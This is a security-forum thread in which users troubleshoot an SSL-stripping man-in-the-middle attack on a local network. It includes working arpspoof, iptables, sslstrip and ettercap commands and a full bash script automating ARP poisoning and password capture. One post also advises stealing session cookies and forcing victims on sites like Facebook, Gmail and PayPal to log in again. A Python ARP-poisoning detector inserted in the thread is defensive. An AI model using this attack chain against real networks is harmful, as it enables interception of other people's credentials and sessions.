[help] Got strucked in last step of ssl stripping
  • mandi
    Posts: 207
    Here is the scenario

    my back-track ip(i am using backtrack 4 inside vmware)-- 192.168.12.37
    victim ip(windows 7) 192.168.12.40
    default gateway 192.168.1.4(windows 2003 server)

    subnet mask for all IPs 255.255.240.0


    first i fired up a shell
    and typed


    echo 1 > /proc/sys/net/ipv4/ip_forward


    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


    opened another shell

    arpspoof -i eth0 -t 192.168.12.40 192.168.1.4


    step 3:

    start--->backtrack--->privilegeescalation--->all--->spoofing-->ssl strip

    opened the tool and then i typed

    sslstrip -a


    opened another shell typed

    ettercap -T -q -i -eth0

    i am getting errors instead of success :(


    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Listening on -eth0...
    ERROR : 19, No such device
    [ec_capture.c:capture_init:146]

    pcap_open: SIOCGIFHWADDR: No such device



    i don't know what is wrong at the last step?

    how to rectify this error?

    can some one help me?
  • Sh3llc0d3
    Posts: 1,910
    By the looks of it you're having possibly a similar problem to Xinapse... can you do me the honor of posting the output of "ifconfig".
  • mandi
    Posts: 207
    here it is mate

    eth0 Link encap:Ethernet HWaddr 00:0c:29:9f:6d:1f
    inet addr:192.168.12.37 Bcast:192.168.15.255 Mask:255.255.240.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:72 errors:0 dropped:0 overruns:0 frame:0
    TX packets:33 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:6624 (6.6 KB) TX bytes:1386 (1.3 KB)
    Interrupt:19 Base address:0x2024

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:28 errors:0 dropped:0 overruns:0 frame:0
    TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:3136 (3.1 KB) TX bytes:3136 (3.1 KB)
  • chroniccommand
    Posts: 1,389
    mandi said:

    here it is mate

    eth0 Link encap:Ethernet HWaddr 00:0c:29:9f:6d:1f
    inet addr:192.168.12.37 Bcast:192.168.15.255 Mask:255.255.240.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:72 errors:0 dropped:0 overruns:0 frame:0
    TX packets:33 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:6624 (6.6 KB) TX bytes:1386 (1.3 KB)
    Interrupt:19 Base address:0x2024

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:28 errors:0 dropped:0 overruns:0 frame:0
    TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:3136 (3.1 KB) TX bytes:3136 (3.1 KB)

    Hm, I think it's a problem with the virtual box. It's set as eth0, which is a wired connection. Try playing around with the settings in the VBox and see if you can change that. What virtual box program do you use?
  • Sh3llc0d3
    Posts: 1,910
    >>>>DURRRR

    Check your ettercap command. It should be "-i eth0"; don't add an extra - before eth0 like you have: "-i -eth0".

    -i specifies the interface.
  • mandi
    Posts: 207
    Will give it a try and let you know. By the way, I didn't get any error in the ettercap command; I did it as per the backtrack tutorial videos...
  • Sh3llc0d3
    Posts: 1,910
    Yeah just try:

    ettercap -T -q -i eth0

    Instead of

    ettercap -T -q -i -eth0
  • mandi
    Posts: 207
    Also I got another suggestion from a HF member, like this:
    he said we never need ettercap in the SSL stripping, and he also suggested me to do it like this:

    sslstrip -l 10000, and advised me not to use ettercap, and he says all the plain text will be available in the log....

    I am not that much good in Linux, so I want to hear your advice mate....
  • Sh3llc0d3
    Posts: 1,910
    For your purposes above, you're using arpspoof to perform ARP cache poisoning, and then you should run sslstrip after that. Ettercap in this case is not needed; you'd use it instead of arpspoof.

    Check out my MITM/sniffing tutorials in the network sec section and it'll give you the ettercap way of doing it instead of arpspoof, if you want to see the difference.
  • fobos
    Posts: 5
    hello to all. Let's take it from the beginning...

    You need ettercap, arpspoof, sslstrip, konsole. (you don't need but it's good to have) iptables and hamster.

    1. you connect to the network you want to attack
    2. you seek for your victims
    3. you sniff the connections

    keep in mind not to alter /etc/etter.conf
    Use hamster
    You always look at the stolen cookies

    run the script

    #!/bin/bash
    clear
    echo "Hello $USER!"
    echo "Welcome to the SSL sniffing script"
    clear
    echo "What's the interface you'll be using? [eth0]"
    read iface
    if [ "$iface" = "" ]
    then
    iface="eth0"
    fi
    clear
    echo "What's the target's IP?"
    read tip
    clear
    echo "What's the target's gateway? [192.168.1.1]"
    read tdg
    if [ "$tdg" = "" ]
    then
    tdg="192.168.1.1"
    fi
    clear
    echo "The selected interface is $iface"
    echo "The target IP is $tip"
    echo "The target gateway is $tdg"
    echo "I'm ready to run the script."
    echo "Are you sure you want to run it [y/n]?"
    read yn
    if [ "$yn" != "y" ]
    then
    echo "Exiting..."
    echo "Have a nice day :)"
    exit 0
    fi
    clear
    echo "Running..."
    echo 1 > /proc/sys/net/ipv4/ip_forward
    konsole -e arpspoof -i $iface -t $tip $tdg &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    konsole -e sslstrip -a -k -f -l 10000 &
    clear
    echo "Running ettercap"
    ettercap -T -q -u -i $iface
    clear
    echo "All cleaned up."
    echo "Have a nice day :)"

    while you see the cookies, connect to the website (facebook, gmail, paypal etc) and you press disconnect.

    This will make the victim login again. ;)
    He won't get a false certificate this time...


    basic commands

    echo 1 > /proc/sys/net/ipv4/ip_forward
    konsole -e arpspoof -i $iface -t $tip $tdg

    you pretend to be the router so everything passes from you
    -iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    -konsole -e  sslstrip -a -k -f -l 10000

    (sslstrip - when the victim tries to create a secure connection, sslstrip understands it and, as it works like a proxy, it creates a connection to the website, but not a secure one.)

    sslstrip works, so collect the passwords with ettercap...

    -ettercap -T -q -u -i $iface (unoffensive mode)

    -[eof]-

    ps: you can use ettercap and not arpspoof (the problem here is that you get double packets) with the command
    ettercap -qT -M arp:remote -i $ifname // //
    for a specific target and gateway..
    ettercap -qT -M arp:remote -i $ifname /$tdg/ /$tip/

    you can also do a route -n

    ifname=`route -n | grep 0.0.0.0 | grep UG | awk '{print $NF}'` 
    tdg=`route -n | grep UG | grep $ifname | awk '{print $2}'`


    excuse my English...

    that's all folks.
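    The thread's posts describe the same mechanism twice ("you pretend to be the router so everything passes from you", and ettercap's arp:remote poisoning of both target and gateway), which is also what a defender can key on: the gateway's IP suddenly answering ARP from a different MAC, and one MAC claiming several IPs at once. The following detector is an added example written for this thread, not code from any poster or tool mentioned here. It assumes a constructed log format of one ARP reply per line, "<time> <ip> is-at <mac>" (modelled loosely on what a sniffer prints for ARP replies), and uses the VM's MAC from the ifconfig output above as the constructed "poisoner" address.

```python
"""ARP cache poisoning detector over a small, constructed ARP reply log.

Added example for this thread (not from the original posts). The log format is
assumed: one ARP reply per line, "<time> <sender_ip> is-at <sender_mac>".
"""
from collections import defaultdict

# Constructed sample. The gateway 192.168.1.4 first answers from its real MAC,
# then a second host (MAC 00:0c:29:9f:6d:1f, taken from the thread's ifconfig
# output) starts claiming the gateway's IP and then the victim's IP as well,
# which is exactly the picture arpspoof / ettercap arp:remote produce.
SAMPLE_LOG = """\
10:00:01 192.168.1.4 is-at 00:11:22:33:44:55
10:00:02 192.168.12.40 is-at aa:bb:cc:dd:ee:01
10:00:05 192.168.1.4 is-at 00:11:22:33:44:55
10:00:07 192.168.1.4 is-at 00:0c:29:9f:6d:1f
10:00:09 192.168.1.4 is-at 00:0c:29:9f:6d:1f
10:00:11 192.168.12.40 is-at 00:0c:29:9f:6d:1f
"""


def parse_arp_replies(text):
    """Return a list of (time, ip, mac) tuples; lines that are not ARP replies are skipped."""
    replies = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "is-at":
            continue
        ts, ip, _, mac = parts
        replies.append((ts, ip, mac.lower()))
    return replies


def detect_arp_spoofing(replies, watched_ips=None):
    """Flag two signatures of ARP cache poisoning.

    - "mac-change": an IP that was previously announced from one MAC is now
      announced from another (the gateway "moving" to the attacker's NIC).
    - "mac-claims-multiple-ips": one MAC announces more than one IP, which is
      what poisoning both the victim and the gateway looks like.

    watched_ips (optional) restricts checks to e.g. the default gateway.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        if watched_ips is not None and ip not in watched_ips:
            continue
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": ts, "type": "mac-change",
                           "ip": ip, "old": prev, "new": mac})
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append({"time": ts, "type": "mac-claims-multiple-ips",
                               "mac": mac, "ips": sorted(mac_to_ips[mac])})
    return alerts


def run_demo():
    """Run the detector over the constructed log and return its alerts."""
    return detect_arp_spoofing(parse_arp_replies(SAMPLE_LOG))


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

    On the sample log this raises three alerts: the gateway IP changing MAC at 10:00:07, the victim IP changing MAC at 10:00:11, and the same MAC holding both IPs from that moment on. In practice the first signature is the cheap one to deploy (pin the gateway's MAC and alert on any ARP reply that disagrees), and a switch feature such as dynamic ARP inspection or a static ARP entry for the gateway on the host removes the exposure rather than just detecting it.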
  • Sh3llc0d3
    Posts: 1,910
    Nice scripts, however I prefer to do it manually :). Mandi's original problem was a simple incorrect spelling; the tutorial was correct....

    Also, not sure if you mean never alter etter.conf, but to perform certain attacks in ettercap you have to.

    Welcome to the forum anyway fobos :)
  • fobos
    Posts: 5
    i said it because sometimes you have to disable/enable port forward etc in etter.conf :)
  • Corrosion
    Posts: 121
    Drop ettercap and use arpspoof